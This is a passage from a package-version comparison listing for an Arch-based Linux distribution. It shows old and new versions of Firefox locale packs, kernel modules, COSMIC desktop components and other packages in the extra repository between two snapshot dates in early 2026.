                     firefox-i18n-br            147.0.2-1                    -
                     firefox-i18n-bs            147.0.2-1                    -
                     firefox-i18n-ca            147.0.2-1                    -
            firefox-i18n-ca-valencia            147.0.2-1                    -
                    firefox-i18n-cak            147.0.2-1                    -
                     firefox-i18n-cs            147.0.2-1                    -
                     firefox-i18n-cy            147.0.2-1                    -
                     firefox-i18n-da            147.0.2-1                    -
                     firefox-i18n-de            147.0.2-1                    -
                    firefox-i18n-dsb            147.0.2-1                    -
                     firefox-i18n-el            147.0.2-1                    -
                  firefox-i18n-en-ca            147.0.2-1                    -
                  firefox-i18n-en-gb            147.0.2-1                    -
                  firefox-i18n-en-us            147.0.2-1                    -
                     firefox-i18n-eo            147.0.2-1                    -
                  firefox-i18n-es-ar            147.0.2-1                    -
                  firefox-i18n-es-cl            147.0.2-1                    -
                  firefox-i18n-es-es            147.0.2-1                    -
                  firefox-i18n-es-mx            147.0.2-1                    -
                     firefox-i18n-et            147.0.2-1                    -
                     firefox-i18n-eu            147.0.2-1                    -
                     firefox-i18n-fa            147.0.2-1                    -
                     firefox-i18n-ff            147.0.2-1                    -
                     firefox-i18n-fi            147.0.2-1                    -
                     firefox-i18n-fr            147.0.2-1                    -
                    firefox-i18n-fur            147.0.2-1                    -
                  firefox-i18n-fy-nl            147.0.2-1                    -
                  firefox-i18n-ga-ie            147.0.2-1                    -
                     firefox-i18n-gd            147.0.2-1                    -
                     firefox-i18n-gl            147.0.2-1                    -
                     firefox-i18n-gn            147.0.2-1                    -
                  firefox-i18n-gu-in            147.0.2-1                    -
                     firefox-i18n-he            147.0.2-1                    -
                  firefox-i18n-hi-in            147.0.2-1                    -
                     firefox-i18n-hr            147.0.2-1                    -
                    firefox-i18n-hsb            147.0.2-1                    -
                     firefox-i18n-hu            147.0.2-1                    -
                  firefox-i18n-hy-am            147.0.2-1                    -
                     firefox-i18n-ia            147.0.2-1                    -
                     firefox-i18n-id            147.0.2-1                    -
                     firefox-i18n-is            147.0.2-1                    -
                     firefox-i18n-it            147.0.2-1                    -
                     firefox-i18n-ja            147.0.2-1                    -
                     firefox-i18n-ka            147.0.2-1                    -
                    firefox-i18n-kab            147.0.2-1                    -
                     firefox-i18n-kk            147.0.2-1                    -
                     firefox-i18n-km            147.0.2-1                    -
                     firefox-i18n-kn            147.0.2-1                    -
                     firefox-i18n-ko            147.0.2-1                    -
                    firefox-i18n-lij            147.0.2-1                    -
                     firefox-i18n-lt            147.0.2-1                    -
                     firefox-i18n-lv            147.0.2-1                    -
                     firefox-i18n-mk            147.0.2-1                    -
                     firefox-i18n-mr            147.0.2-1                    -
                     firefox-i18n-ms            147.0.2-1                    -
                     firefox-i18n-my            147.0.2-1                    -
                  firefox-i18n-nb-no            147.0.2-1                    -
                  firefox-i18n-ne-np            147.0.2-1                    -
                     firefox-i18n-nl            147.0.2-1                    -
                  firefox-i18n-nn-no            147.0.2-1                    -
                     firefox-i18n-oc            147.0.2-1                    -
                  firefox-i18n-pa-in            147.0.2-1                    -
                     firefox-i18n-pl            147.0.2-1                    -
                  firefox-i18n-pt-br            147.0.2-1                    -
                  firefox-i18n-pt-pt            147.0.2-1                    -
                     firefox-i18n-rm            147.0.2-1                    -
                     firefox-i18n-ro            147.0.2-1                    -
                     firefox-i18n-ru            147.0.2-1                    -
                    firefox-i18n-sat            147.0.2-1                    -
                     firefox-i18n-sc            147.0.2-1                    -
                    firefox-i18n-sco            147.0.2-1                    -
                     firefox-i18n-si            147.0.2-1                    -
                     firefox-i18n-sk            147.0.2-1                    -
                    firefox-i18n-skr            147.0.2-1                    -
                     firefox-i18n-sl            147.0.2-1                    -
                    firefox-i18n-son            147.0.2-1                    -
                     firefox-i18n-sq            147.0.2-1                    -
                     firefox-i18n-sr            147.0.2-1                    -
                  firefox-i18n-sv-se            147.0.2-1                    -
                    firefox-i18n-szl            147.0.2-1                    -
                     firefox-i18n-ta            147.0.2-1                    -
                     firefox-i18n-te            147.0.2-1                    -
                     firefox-i18n-tg            147.0.2-1                    -
                     firefox-i18n-th            147.0.2-1                    -
                     firefox-i18n-tl            147.0.2-1                    -
                     firefox-i18n-tr            147.0.2-1                    -
                    firefox-i18n-trs            147.0.2-1                    -
                     firefox-i18n-uk            147.0.2-1                    -
                     firefox-i18n-ur            147.0.2-1                    -
                     firefox-i18n-uz            147.0.2-1                    -
                     firefox-i18n-vi            147.0.2-1                    -
                     firefox-i18n-xh            147.0.2-1                    -
                  firefox-i18n-zh-cn            147.0.2-1                    -
                  firefox-i18n-zh-tw            147.0.2-1                    -
                gnome-control-center               49.3-1               49.4-1
                   gnome-keybindings               49.3-1               49.4-1
                       libfprint-git1.94.8.r74.g4bf6199-1                    -
                 libfprint-git-debug1.94.8.r74.g4bf6199-1                    -
    linux510-virtualbox-host-modules              7.2.4-6              7.2.6-1
    linux515-virtualbox-host-modules              7.2.4-6              7.2.6-1
  linux61-rt-virtualbox-host-modules              7.2.4-4              7.2.6-1
     linux61-virtualbox-host-modules              7.2.4-7              7.2.6-1
                  linux612-acpi_call             1.2.2-95             1.2.2-96
                   linux612-bbswitch               0.8-93               0.8-94
                linux612-broadcom-wl      6.30.223.271-94      6.30.223.271-95
               linux612-nvidia-390xx           390.157-95           390.157-96
               linux612-nvidia-470xx        470.256.02-95        470.256.02-96
               linux612-nvidia-570xx         570.211.01-3         570.211.01-4
          linux612-nvidia-570xx-open         570.211.01-3         570.211.01-4
               linux612-nvidia-575xx         575.64.05-22         575.64.05-23
          linux612-nvidia-575xx-open         575.64.05-22         575.64.05-23
                     linux612-nvidia          590.48.01-6          590.48.01-7
                linux612-nvidia-open          590.48.01-6          590.48.01-7
                      linux612-r8168          8.055.00-73          8.055.00-74
 linux612-rt-virtualbox-host-modules              7.2.4-4              7.2.6-1
                  linux612-rtl8723bu          20250811-30          20250811-31
                   linux612-tp_smapi              0.45-39              0.45-40
                linux612-vhba-module          20250329-56          20250329-57
    linux612-virtualbox-host-modules             7.2.4-15              7.2.6-2
                        linux612-zfs              2.3.5-9             2.3.5-10
 linux617-rt-virtualbox-host-modules              7.2.4-4              7.2.6-1
                  linux618-acpi_call             1.2.2-11             1.2.2-12
                   linux618-bbswitch               0.8-11               0.8-12
                linux618-broadcom-wl      6.30.223.271-11      6.30.223.271-12
               linux618-nvidia-390xx           390.157-11           390.157-12
               linux618-nvidia-470xx        470.256.02-11        470.256.02-12
               linux618-nvidia-570xx         570.211.01-3         570.211.01-4
          linux618-nvidia-570xx-open         570.211.01-3         570.211.01-4
               linux618-nvidia-575xx         575.64.05-11         575.64.05-12
          linux618-nvidia-575xx-open         575.64.05-11         575.64.05-12
                     linux618-nvidia          590.48.01-8          590.48.01-9
                linux618-nvidia-open          590.48.01-8          590.48.01-9
                      linux618-r8168          8.055.00-11          8.055.00-12
                  linux618-rtl8723bu          20250813-11          20250813-12
                   linux618-tp_smapi              0.45-11              0.45-12
                linux618-vhba-module          20250329-11          20250329-12
    linux618-virtualbox-host-modules             7.2.4-11              7.2.6-2
                        linux618-zfs              2.3.5-9             2.3.5-10
    linux619-virtualbox-host-modules            7.2.4-0.8            7.2.6-0.1
                   linux66-acpi_call            1.2.2-167            1.2.2-168
                    linux66-bbswitch              0.8-164              0.8-165
                 linux66-broadcom-wl     6.30.223.271-165     6.30.223.271-166
                linux66-nvidia-390xx          390.157-162          390.157-163
                linux66-nvidia-470xx       470.256.02-105       470.256.02-106
                linux66-nvidia-570xx         570.211.01-2         570.211.01-3
           linux66-nvidia-570xx-open         570.211.01-2         570.211.01-3
                linux66-nvidia-575xx         575.64.05-18         575.64.05-19
           linux66-nvidia-575xx-open         575.64.05-18         575.64.05-19
                      linux66-nvidia          590.48.01-4          590.48.01-5
                 linux66-nvidia-open          590.48.01-4          590.48.01-5
                       linux66-r8168          8.055.00-56          8.055.00-57
  linux66-rt-virtualbox-host-modules              7.2.4-6              7.2.6-1
                   linux66-rtl8723bu          20250811-25          20250811-26
                    linux66-tp_smapi              0.45-34              0.45-35
                 linux66-vhba-module          20250329-43          20250329-44
     linux66-virtualbox-host-modules             7.2.4-11              7.2.6-2
                         linux66-zfs              2.3.5-5              2.3.5-6
                           morc_menu     1.0+3+g2d89cb6-1     1.0+5+g91598f8-1
                 plasma-keyboard-git       r113.3511c9f-1                    -
                  rog-control-center              6.3.1-1              6.3.2-1
                      signal-desktop             7.87.0-1                    -
               vivaldi-ffmpeg-codecs     144.0.7559.114-1                    -


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20260128             20260131
-------------------------------------------------------------------------------
                         389-ds-base              3.2.0-1              3.2.0-2
                          aliyun-cli              3.2.7-1              3.2.9-1
                          apostrophe                3.4-2                3.4-3
                           appstream              1.1.1-1              1.1.2-1
                        appstream-qt              1.1.1-1              1.1.2-1
                              assimp              6.0.2-1              6.0.4-1
                               avahi           1:0.9rc2-3           1:0.9rc3-1
                              bazaar              0.7.5-1              0.7.6-1
                       bbswitch-dkms              0.8-797              0.8-798
                             blender           17:5.0.1-2           17:5.0.1-3
                           borgmatic              2.1.0-1              2.1.1-1
                          bpf-linker             0.9.15-1             0.10.0-1
                        bridge-utils              1.7.1-3                    -
                          bugstalker              0.4.1-1              0.4.2-1
                            buildkit             0.27.0-1             0.27.1-1
                                 bup             0.33.9-2            0.33.10-1
                             cargo-c            0.10.19-1            0.10.20-1
                         cargo-insta             1.46.1-1             1.46.2-1
                      cargo-zigbuild             0.21.4-1             0.21.5-1
                           chess-tui              2.3.0-1              2.4.0-1
                            chromium      144.0.7559.96-1     144.0.7559.109-1
                             clojure        1.12.4.1582-1        1.12.4.1602-1
                cloudflare-speed-cli              0.6.0-1              0.6.1-1
                         cloudflared           2026.1.1-1           2026.1.2-1
                             cockpit                354-2                355-1
                    cockpit-machines                346-1                347-1
                  cockpit-packagekit                354-2                355-1
                      cockpit-podman              119.1-1                120-1
                    cockpit-storaged                354-2                355-1
                            composer              2.9.4-1              2.9.5-1
                     cool-retro-term              1.2.0-4         2.0.0beta1-2
                  cosmic-app-library            1:1.0.3-1            1:1.0.4-1
                      cosmic-applets            1:1.0.3-1            1:1.0.4-1
                           cosmic-bg            1:1.0.3-1            1:1.0.4-1
                         cosmic-comp            1:1.0.3-1            1:1.0.4-1
                        cosmic-files            1:1.0.3-1            1:1.0.4-1
                      cosmic-greeter            1:1.0.3-1            1:1.0.4-1
                   cosmic-icon-theme            1:1.0.3-1            1:1.0.4-1
                         cosmic-idle            1:1.0.3-1            1:1.0.4-1
                cosmic-initial-setup            1:1.0.3-1            1:1.0.4-1
                     cosmic-launcher            1:1.0.3-1            1:1.0.4-1
                cosmic-notifications            1:1.0.3-1            1:1.0.4-1
                          cosmic-osd            1:1.0.3-2            1:1.0.4-1
                        cosmic-panel            1:1.0.3-1            1:1.0.4-1
                       cosmic-player            1:1.0.3-1            1:1.0.4-1
                        cosmic-randr            1:1.0.3-1            1:1.0.4-1
                   cosmic-screenshot            1:1.0.3-1            1:1.0.4-1
                      cosmic-session            1:1.0.3-1            1:1.0.4-1
                     cosmic-settings            1:1.0.3-1            1:1.0.4-1
              cosmic-settings-daemon            1:1.0.3-1            1:1.0.4-1
                        cosmic-store            1:1.0.3-1            1:1.0.4-1
                     cosmic-terminal            1:1.0.3-1            1:1.0.4-1
                  cosmic-text-editor            1:1.0.3-1            1:1.0.4-1
                   cosmic-wallpapers            2:1.0.3-1            2:1.0.4-1
                   cosmic-workspaces            2:1.0.3-1            2:1.0.4-1
                             cryptol             3.3.0-37             3.3.0-38
                            cutensor            2.4.1.4-1            2.5.0.2-1
                                cyme             2.2.10-1             2.2.11-1
                                dgop             0.1.13-1              0.2.0-1
                                dolt           1:1.81.2-1           1:1.81.3-1
                 drone-runner-docker              1.8.4-1              1.8.5-1
                         easyeffects              8.1.0-1              8.1.1-1
                editorconfig-checker              3.6.0-1              3.6.1-1
                          electron38             38.7.2-1             38.8.0-1
                          electron39             39.3.0-1             39.4.0-1
                                 eog               47.0-4               49.1-1
                            eog-docs               47.0-4               49.1-1
                             esphome          2025.12.5-1           2026.1.2-1
                        feathernotes              1.3.2-1              1.4.0-1
                    feeluown-netease              1.0.6-2              1.0.7-1
                             firefox            147.0.1-1            147.0.2-1
           firefox-developer-edition            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-ach            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-af            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-an            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ar            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-ast            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-az            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-be            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-bg            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-bn            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-br            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-bs            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ca            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-ca-valencia      148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-cak            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-cs            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-cy            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-da            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-de            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-dsb            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-el            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-en-ca            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-en-gb            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-en-us            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-eo            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-es-ar            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-es-cl            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-es-es            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-es-mx            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-et            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-eu            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-fa            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ff            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-fi            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-fr            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-fur            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-fy-nl            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-ga-ie            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-gd            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-gl            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-gn            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-gu-in            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-he            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-hi-in            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-hr            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-hsb            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-hu            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-hy-am            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ia            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-id            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-is            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-it            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ja            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ka            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-kab            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-kk            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-km            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-kn            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ko            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-lij            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-lt            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-lv            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-mk            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-mr            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ms            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-my            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-nb-no            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-ne-np            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-nl            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-nn-no            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-oc            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-pa-in            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-pl            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-pt-br            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-pt-pt            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-rm            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ro            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ru            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-sat            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-sc            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-sco            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-si            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-sk            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-skr            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-sl            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-son            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-sq            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-sr            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-sv-se            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-szl            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ta            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-te            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-tg            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-th            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-tl            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-tr            148.0b7-1            148.0b9-1
  firefox-developer-edition-i18n-trs            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-uk            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-ur            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-uz            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-vi            148.0b7-1            148.0b9-1
   firefox-developer-edition-i18n-xh            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-zh-cn            148.0b7-1            148.0b9-1
firefox-developer-edition-i18n-zh-tw            148.0b7-1            148.0b9-1
                    firefox-i18n-ach            147.0.1-1            147.0.2-1
                     firefox-i18n-af            147.0.1-1            147.0.2-1
                     firefox-i18n-an            147.0.1-1            147.0.2-1
                     firefox-i18n-ar            147.0.1-1            147.0.2-1
                    firefox-i18n-ast            147.0.1-1            147.0.2-1
                     firefox-i18n-az            147.0.1-1            147.0.2-1
                     firefox-i18n-be            147.0.1-1            147.0.2-1
                     firefox-i18n-bg            147.0.1-1            147.0.2-1
                     firefox-i18n-bn            147.0.1-1            147.0.2-1
                     firefox-i18n-br            147.0.1-1            147.0.2-1
                     firefox-i18n-bs            147.0.1-1            147.0.2-1
                     firefox-i18n-ca            147.0.1-1            147.0.2-1
            firefox-i18n-ca-valencia            147.0.1-1            147.0.2-1
                    firefox-i18n-cak            147.0.1-1            147.0.2-1
                     firefox-i18n-cs            147.0.1-1            147.0.2-1
                     firefox-i18n-cy            147.0.1-1            147.0.2-1
                     firefox-i18n-da            147.0.1-1            147.0.2-1
                     firefox-i18n-de            147.0.1-1            147.0.2-1
                    firefox-i18n-dsb            147.0.1-1            147.0.2-1
                     firefox-i18n-el            147.0.1-1            147.0.2-1
                  firefox-i18n-en-ca            147.0.1-1            147.0.2-1
                  firefox-i18n-en-gb            147.0.1-1            147.0.2-1
                  firefox-i18n-en-us            147.0.1-1            147.0.2-1
                     firefox-i18n-eo            147.0.1-1            147.0.2-1
                  firefox-i18n-es-ar            147.0.1-1            147.0.2-1
                  firefox-i18n-es-cl            147.0.1-1            147.0.2-1
                  firefox-i18n-es-es            147.0.1-1            147.0.2-1
                  firefox-i18n-es-mx            147.0.1-1            147.0.2-1
                     firefox-i18n-et            147.0.1-1            147.0.2-1
                     firefox-i18n-eu            147.0.1-1            147.0.2-1
                     firefox-i18n-fa            147.0.1-1            147.0.2-1
                     firefox-i18n-ff            147.0.1-1            147.0.2-1
                     firefox-i18n-fi            147.0.1-1            147.0.2-1
                     firefox-i18n-fr            147.0.1-1            147.0.2-1
                    firefox-i18n-fur            147.0.1-1            147.0.2-1
                  firefox-i18n-fy-nl            147.0.1-1            147.0.2-1
                  firefox-i18n-ga-ie            147.0.1-1            147.0.2-1
                     firefox-i18n-gd            147.0.1-1            147.0.2-1
                     firefox-i18n-gl            147.0.1-1            147.0.2-1
                     firefox-i18n-gn            147.0.1-1            147.0.2-1
                  firefox-i18n-gu-in            147.0.1-1            147.0.2-1
                     firefox-i18n-he            147.0.1-1            147.0.2-1
                  firefox-i18n-hi-in            147.0.1-1            147.0.2-1
                     firefox-i18n-hr            147.0.1-1            147.0.2-1
                    firefox-i18n-hsb            147.0.1-1            147.0.2-1
                     firefox-i18n-hu            147.0.1-1            147.0.2-1
                  firefox-i18n-hy-am            147.0.1-1            147.0.2-1
                     firefox-i18n-ia            147.0.1-1            147.0.2-1
                     firefox-i18n-id            147.0.1-1            147.0.2-1
                     firefox-i18n-is            147.0.1-1            147.0.2-1
                     firefox-i18n-it            147.0.1-1            147.0.2-1
                     firefox-i18n-ja            147.0.1-1            147.0.2-1
                     firefox-i18n-ka            147.0.1-1            147.0.2-1
                    firefox-i18n-kab            147.0.1-1            147.0.2-1
                     firefox-i18n-kk            147.0.1-1            147.0.2-1
                     firefox-i18n-km            147.0.1-1            147.0.2-1
                     firefox-i18n-kn            147.0.1-1            147.0.2-1
                     firefox-i18n-ko            147.0.1-1            147.0.2-1
                    firefox-i18n-lij            147.0.1-1            147.0.2-1
                     firefox-i18n-lt            147.0.1-1            147.0.2-1
                     firefox-i18n-lv            147.0.1-1            147.0.2-1
                     firefox-i18n-mk            147.0.1-1            147.0.2-1
                     firefox-i18n-mr            147.0.1-1            147.0.2-1
                     firefox-i18n-ms            147.0.1-1            147.0.2-1
                     firefox-i18n-my            147.0.1-1            147.0.2-1
                  firefox-i18n-nb-no            147.0.1-1            147.0.2-1
                  firefox-i18n-ne-np            147.0.1-1            147.0.2-1
                     firefox-i18n-nl            147.0.1-1            147.0.2-1
                  firefox-i18n-nn-no            147.0.1-1            147.0.2-1
                     firefox-i18n-oc            147.0.1-1            147.0.2-1
                  firefox-i18n-pa-in            147.0.1-1            147.0.2-1
                     firefox-i18n-pl            147.0.1-1            147.0.2-1
                  firefox-i18n-pt-br            147.0.1-1            147.0.2-1
                  firefox-i18n-pt-pt            147.0.1-1            147.0.2-1
                     firefox-i18n-rm            147.0.1-1            147.0.2-1
                     firefox-i18n-ro            147.0.1-1            147.0.2-1
                     firefox-i18n-ru            147.0.1-1            147.0.2-1
                    firefox-i18n-sat            147.0.1-1            147.0.2-1
                     firefox-i18n-sc            147.0.1-1            147.0.2-1
                    firefox-i18n-sco            147.0.1-1            147.0.2-1
                     firefox-i18n-si            147.0.1-1            147.0.2-1
                     firefox-i18n-sk            147.0.1-1            147.0.2-1
                    firefox-i18n-skr            147.0.1-1            147.0.2-1
                     firefox-i18n-sl            147.0.1-1            147.0.2-1
                    firefox-i18n-son            147.0.1-1            147.0.2-1
                     firefox-i18n-sq            147.0.1-1            147.0.2-1
                     firefox-i18n-sr            147.0.1-1            147.0.2-1
                  firefox-i18n-sv-se            147.0.1-1            147.0.2-1
                    firefox-i18n-szl            147.0.1-1            147.0.2-1
                     firefox-i18n-ta            147.0.1-1            147.0.2-1
                     firefox-i18n-te            147.0.1-1            147.0.2-1
                     firefox-i18n-tg            147.0.1-1            147.0.2-1
                     firefox-i18n-th            147.0.1-1            147.0.2-1
                     firefox-i18n-tl            147.0.1-1            147.0.2-1
                     firefox-i18n-tr            147.0.1-1            147.0.2-1
                    firefox-i18n-trs            147.0.1-1            147.0.2-1
                     firefox-i18n-uk            147.0.1-1            147.0.2-1
                     firefox-i18n-ur            147.0.1-1            147.0.2-1
                     firefox-i18n-uz            147.0.1-1            147.0.2-1
                     firefox-i18n-vi            147.0.1-1            147.0.2-1
                     firefox-i18n-xh            147.0.1-1            147.0.2-1
                  firefox-i18n-zh-cn            147.0.1-1            147.0.2-1
                  firefox-i18n-zh-tw            147.0.1-1            147.0.2-1
                             forgejo             14.0.1-1             14.0.2-1
                             freerdp           2:3.21.0-1           2:3.22.0-1
                         fuse-common             3.17.4-1             3.18.1-1
                               fuse3             3.17.4-1             3.18.1-1
                          gemini-cli           1:0.25.2-1           1:0.26.0-1
                                giac           2.0.0.18-2           2.0.0.19-1
                              gio-qt             0.0.13-1             0.0.14-1
                                glab             1.81.0-1             1.82.0-1
                      gnome-mahjongg             49.0.1-1             49.1.1-1
                          gnome-maps               49.3-1               49.4-1
                               gsoap            2.8.139-1            2.8.140-1
                             haproxy              3.3.1-1              3.3.2-1
                    haskell-cracknum               3.5-57               3.5-58
                    haskell-fourmolu           0.12.0.0-8           0.13.0.0-1
         haskell-hls-fourmolu-plugin            2.2.0.0-5            2.2.0.0-6
             haskell-language-server            2.2.0.0-6            2.2.0.0-7
                         haskell-sbv              10.2-74               10.3-1
                              hcloud             1.60.0-1             1.61.0-1
                             htmldoc             1.9.22-1             1.9.23-1
                           hyprpaper              0.8.2-1              0.8.3-1
                           ibus-rime              1.5.1-1              1.6.0-1
                 ibus-typing-booster             2.30.0-1             2.30.2-1
                            incus-ui             0.19.2-1             0.19.3-1
                   jupyter-nbconvert             7.16.6-2             7.17.0-1
                              kaidan             0.14.0-1             0.14.0-2
                                 kio             6.22.0-1             6.22.1-1
                              kmscon              9.3.0-2              9.3.0-3
                     lib32-rust-libs           1:1.92.0-1           1:1.93.0-1
                          libchewing             0.10.3-1             0.11.0-1
                               libhx                5.0-1                5.1-1
                  libpackagekit-glib              1.3.3-2              1.3.4-1
                         libpg_query           17.6.2.1-1           17.6.2.2-1
                      libphonenumber           1:9.0.22-1           1:9.0.23-1
                             librime           1:1.16.0-1           1:1.16.1-1
                          libshumate              1.5.2-1              1.5.3-1
                     libshumate-docs              1.5.2-1              1.5.3-1
                         libspelling              0.4.9-2             0.4.10-1
                    libspelling-docs              0.4.9-2             0.4.10-1
                              libtsm              4.4.1-1              4.4.2-1
                 libva-nvidia-driver             0.0.14-1             0.0.15-1
                              libxmu              1.3.0-1              1.3.1-1
                  linux-apfs-rw-dkms           1:0.3.17-1           1:0.3.18-1
                         lxqt-config              2.3.0-1              2.3.1-1
                                mame              0.284-1              0.285-1
                          mame-tools              0.284-1              0.285-1
                     man-pages-zh_cn            1.6.4.0-3            1.6.4.0-4
                     man-pages-zh_tw            1.6.4.0-3            1.6.4.0-4
       matrix-authentication-service              1.9.0-1             1.10.0-1
                              md-tui              0.9.1-1              0.9.3-1
                           mercurial              7.1.2-2                7.2-1
               netfilter-fullconenat      r73.0cf3b48-494      r73.0cf3b48-495
                  nextcloud-app-mail              5.6.8-1              5.6.9-1
                               nvtop              3.2.0-1              3.3.1-1
                   open-policy-agent             1.12.3-1             1.13.1-1
                        openai-codex             0.87.0-1             0.91.0-1
                         openimageio            3.1.8.0-3            3.1.9.0-1
                 openshadinglanguage           1.14.8.0-2           1.15.0.0-1
                             openttd               15.0-2               15.1-1
                                 orc             0.4.41-1             0.4.42-1
                          packagekit              1.3.3-2              1.3.4-1
                                 pcp              7.0.5-2              7.1.0-1
                             pcp-gui              7.0.5-2              7.1.0-1
                   pcp-pmda-activemq              7.0.5-2              7.1.0-1
                        pcp-pmda-bcc              7.0.5-2              7.1.0-1
                      pcp-pmda-bind2              7.0.5-2              7.1.0-1
                   pcp-pmda-bpftrace              7.0.5-2              7.1.0-1
                       pcp-pmda-json              7.0.5-2              7.1.0-1
                    pcp-pmda-libvirt              7.0.5-2              7.1.0-1
                      pcp-pmda-mysql              7.0.5-2              7.1.0-1
                      pcp-pmda-nginx              7.0.5-2              7.1.0-1
                 pcp-pmda-nutcracker              7.0.5-2              7.1.0-1
                pcp-pmda-openmetrics              7.0.5-2              7.1.0-1
                     pcp-pmda-podman              7.0.5-2              7.1.0-1
                 pcp-pmda-postgresql              7.0.5-2              7.1.0-1
                       pcp-pmda-snmp              7.0.5-2              7.1.0-1
                    perl-authen-sasl             2.1900-3             2.2000-1
                     perl-net-server              2.015-1              2.016-1
                         perl-rename               1.16-3               1.16-4
                                piep             0.10.0-5             0.10.0-6
                        prusa-slicer              2.9.4-4              2.9.4-5
                         python-absl              2.3.1-2              2.4.0-1
                python-aioesphomeapi            43.12.0-1            43.14.0-1
                 python-bibtexparser              1.4.3-3              1.4.4-1
                      python-confuse              2.1.0-2              2.2.0-1
                         python-cuda             13.1.1-2             13.1.1-3
                python-cuda-bindings             13.1.1-2             13.1.1-3
                    python-cuda-core             13.1.1-2            1:0.5.1-1
